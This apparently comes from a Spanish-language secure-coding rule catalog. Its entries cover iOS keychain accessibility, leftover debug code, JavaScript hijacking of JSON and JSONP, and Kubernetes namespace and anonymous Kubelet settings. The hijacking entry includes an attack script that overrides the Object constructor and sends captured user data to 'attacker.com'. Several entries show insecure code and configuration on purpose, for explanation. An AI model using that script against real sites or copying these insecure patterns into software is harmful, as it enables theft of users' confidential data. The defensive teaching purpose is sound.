Este es el valor predeterminado para los elementos de las llaves que se agregan sin configurar de forma explícita una constante de accesibilidad.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

Cuando las protecciones de las llaves se introdujeron por primera vez, el valor predeterminado era kSecAttrAccessibleAlways, lo que creaba un problema de seguridad ya que si alguien tenía acceso a su dispositivo o lo robaba podía leer el contenido de las llaves. En la actualidad, el atributo predeterminado es kSecAttrAccessibleWhenUnlocked, que es un valor predeterminado razonablemente restrictivo. Sin embargo, la documentación pública de Apple no está de acuerdo sobre cuál debe ser el atributo predeterminado. Por lo tanto, como precaución, debe configurar este atributo de manera explícita en todos los elementos de las llaves.

Ejemplo 1: en el siguiente ejemplo, el elemento de las llaves se almacena sin especificar claramente un nivel de accesibilidad que podrá tener un comportamiento distinto en las distintas versiones de iOS:

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure Keychain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

Un procedimiento habitual de desarrollo consiste en añadir un código de "puerta trasera" diseñado específicamente para fines de depuración o pruebas que no se vaya a enviar o implementar con la aplicación. Cuando este tipo de código de depuración se deja accidentalmente en la aplicación, este se abre en modos de interacción no previstos. Estos puntos de entrada de "puerta trasera" conllevan riesgos de seguridad porque no se tienen en cuenta durante las fases de diseño y pruebas, y no se incluyen en las condiciones de funcionamiento previstas de la aplicación.

El ejemplo más habitual de código de depuración que se ha dejado olvidado es un método main() que aparece en una aplicación web. Aunque se trata de una práctica aceptable durante el desarrollo de productos, las clases que forman parte de una aplicación J2EE de producción no deben definir uno main().

Una aplicación puede ser vulnerable a suplantación de JavaScript si:
1) Utiliza JavaScript como un formato de transferencia de datos.
2) Administra datos confidenciales. Dado que las vulnerabilidades de suplantación de JavaScript no se producen como resultado directo de un error de codificación, Fortify Secure Coding Rulepacks llama la atención ante posibles vulnerabilidades de suplantación de JavaScript mediante la identificación de código que parece generar JavaScript en una respuesta HTTP.

Los exploradores web exigen la política del mismo origen (SOP) para proteger a los usuarios de sitios web malintencionados. La política del mismo origen requiere que, para que JavaScript pueda acceder al contenido de una página web, tanto JavaScript como la página web se deben originar a partir del mismo dominio. Sin la política del mismo origen, un sitio web malintencionado podría dar servicio a JavaScript que carga información confidencial desde otros sitios web mediante las credenciales de clientes, seleccionarla y comunicársela de nuevo al atacante. La suplantación de JavaScript permite a un usuario malintencionado anular la política del mismo origen en el caso de que una aplicación web utilice JavaScript para comunicar información confidencial. El fallo en la política del mismo origen es que permite que se incluya y ejecute JavaScript de cualquier sitio web en el contexto de cualquier otro sitio web. Incluso aunque un sitio malintencionado no pueda examinar directamente los datos cargados desde un sitio vulnerable en el cliente, puede aprovecharse de este fallo configurando un entorno que le permita ser testigo de la ejecución del JavaScript y de cualquier efecto secundario relevante que pueda tener. Puesto que muchas aplicaciones web 2.0 utilizan JavaScript como un mecanismo de transporte de datos, es frecuente que sean vulnerables mientras que las aplicaciones web tradicionales no lo son.

El formato más conocido para comunicar información en JavaScript es la Notación de objetos JavaScript (JSON). JSON RFC define la sintaxis de JSON como un subconjunto de la sintaxis literal de objetos JavaScript. JSON se basa en dos tipos de estructuras de datos: matrices y objetos. Cualquier formato de transporte de datos en el que los mensajes se puedan interpretar como una o más instrucciones de JavaScript es vulnerable a suplantación de JavaScript. JSON hace que la suplantación de JavaScript resulte más fácil por el hecho de que una matriz de JSON es por sí misma una instrucción válida de JavaScript. Puesto que las matrices son una forma natural para comunicar listas, normalmente se utilizan siempre que una aplicación tiene que comunicar varios valores. Dicho de otra forma, una matriz de JSON es directamente vulnerable a suplantación de JavaScript. Un objeto de JSON solo es vulnerable si se enmarca en alguna otra estructura de JavaScript que sea por sí misma una instrucción válida de JavaScript.

Ejemplo 1: El siguiente ejemplo empieza mostrando una interacción de JSON legítima entre los componentes del cliente y el servidor de una aplicación web que se utiliza para administrar oportunidades de ventas. A continuación, se muestra cómo un atacante puede imitar al cliente y obtener acceso a los datos confidenciales que devuelve el servidor. Tenga en cuenta que este ejemplo está pensado para exploradores basados en Mozilla. Otros exploradores estándar no permiten la anulación de constructores nativos cuando se crea un objeto sin utilizar el operador nuevo.

El cliente solicita datos de un servidor y evalúa el resultado como JSON con el siguiente código:

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

Cuando se ejecuta el código, se genera una solicitud HTTP que tiene esta apariencia:

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

(En esta respuesta HTTP y la siguiente, se han omitido los encabezados HTTP que no son directamente relevantes para esta explicación).
El servidor responde con una matriz en formato JSON:

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

En este caso, la matriz en formato JSON contiene información confidencial relacionada con el usuario actual (una lista de oportunidades de ventas). Otros usuarios no pueden acceder a esta información sin conocer el identificador de sesión del usuario. (En la mayoría de aplicaciones web modernas, el identificador de sesión se almacena como una cookie.) No obstante, si una víctima visita un sitio web malintencionado, el sitio malintencionado puede recuperar la información mediante suplantación de JavaScript. Si se puede enga?ar a una víctima para que visite una página web que contiene el siguiente código malintencionado, la información de oportunidades de la víctima se enviará a la página web del atacante.

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

El código malintencionado usa una etiqueta de script que incluye el objeto de JSON en la página actual. El explorador web enviará la cookie de la sesión adecuada con la solicitud. Dicho de otro modo, esta solicitud se tratará del mismo modo que si se hubiera originado en la aplicación legítima.

Cuando la matriz de JSON llegue al cliente, se evaluará dentro del contexto de la pagina malintencionada. Para poder ser testigo de la evaluación del objeto de JSON, la pagina malintencionada ha cambiado la definición de la función de JavaScript que se usa para crear objetos nuevos. De este modo, el código malintencionado ha insertado un enlace que le permite acceder a la creación de cada objeto y transmitir el contenido del objeto al sitio malintencionado. Otros ataques podrían reemplazar el constructor predeterminado por matrices. Las aplicaciones creadas para utilizarse en un mashup suelen invocar a funciones de devolución de llamada al final de cada mensaje de JavaScript. La función de devolución de llamada está prevista para que la defina otra aplicación del mashup. La función de devolución de llamada hace que los ataques de secuestro de JavaScript sean un asunto sencillo; todo lo que tiene que hacer el atacante es definir la función. Las aplicaciones se pueden desarrollar para facilitar su integración en un mashup o para ser seguras, pero no es posible combinar las dos características. Si el usuario no ha iniciado sesión en un sitio vulnerable, el atacante puede compensarlo pidiendo al usuario que inicie sesión y mostrando después la página de inicio de sesión legítima de la aplicación.

Esto no es un ataque de suplantación de identidad (el atacante no obtiene acceso a las credenciales del usuario), de modo que las contramedidas de protección contra la suplantación de identidad no podrán repeler el ataque. Los ataques más complejos podrían realizar una serie de solicitudes a la aplicación haciendo que JavaScript genere dinámicamente etiquetas de scripts. Esta es la misma técnica que en ocasiones se usa para crear mashups de aplicaciones. La única diferencia es que, en esta situación de mashups, una de las aplicaciones es malintencionada.

Ejemplo 2: el siguiente código muestra un método de vista de Django de ejemplo que envía una respuesta JSON que contiene datos confidenciales en forma de una matriz de JSON.

from django.http.response import JsonResponse
...
def handle_upload(request):
  response = JsonResponse(sensitive_data, safe=False)  # Sensitive data is stored in a list
  return response

Debido a su diseño, JSONP permite realizar solicitudes entre dominios pero carece de todo mecanismo para restringir o verificar el origen de las solicitudes. Un sitio malintencionado puede realizar fácilmente una solicitud JSONP en nombre del usuario y procesar la respuesta JSON. Por este motivo, se recomienda encarecidamente evitar esta técnica de comunicación cuando se envíen datos confidenciales o información personalmente identificable.
Debido a su diseño, JSONP es un ataque XSS autoinfligido, ya que para un procesamiento JSON adecuado es necesario que el nombre de la función de devolución de llamada se refleje en el sitio solicitante. Es obligatorio validar e inmunizar el nombre de la función de devolución de llamada para evitar la inyección de JavaScript. Con el fin de inmunizar el nombre de la función de devolución de llamada, considere la posibilidad de crear una lista de caracteres permitidos, cuando sea posible, o admita únicamente caracteres alfanuméricos.

Los espacios de nombres de Kubernetes dividen un clúster en fragmentos manejables. Los espacios de nombres proporcionan un ámbito para los nombres y facilitan la especificación de varias directivas para una subsección de un clúster. De forma predeterminada, Kubernetes asigna un recurso a un espacio de nombres default. El uso de un espacio de nombres diferente al predeterminado reduce el impacto de errores o actividades malintencionadas.

Ejemplo 1: La siguiente configuración establece el espacio de nombres de un recurso en default.

...
kind: ...
metadata:
...
namespace: default
spec:
...

Existe una configuración que permite a Kubelets atender solicitudes anónimas. Las solicitudes anónimas no son rechazadas por ningún método de autenticación configurado. Debido a que los Kubelets son los agentes principales de Kubernetes para administrar la carga de trabajo de equipo del componente, los atacantes pueden usar solicitudes anónimas para obtener acceso a las API de servicios sensibles a la seguridad y con protección insuficiente.

Ejemplo 1: El siguiente archivo de configuración permite que un Kubelet atienda solicitudes anónimas porque el campo anonymous está configurado en enabled:true.

...
kind: KubeletConfiguration
...
authentication:
  anonymous:
    enabled: true
...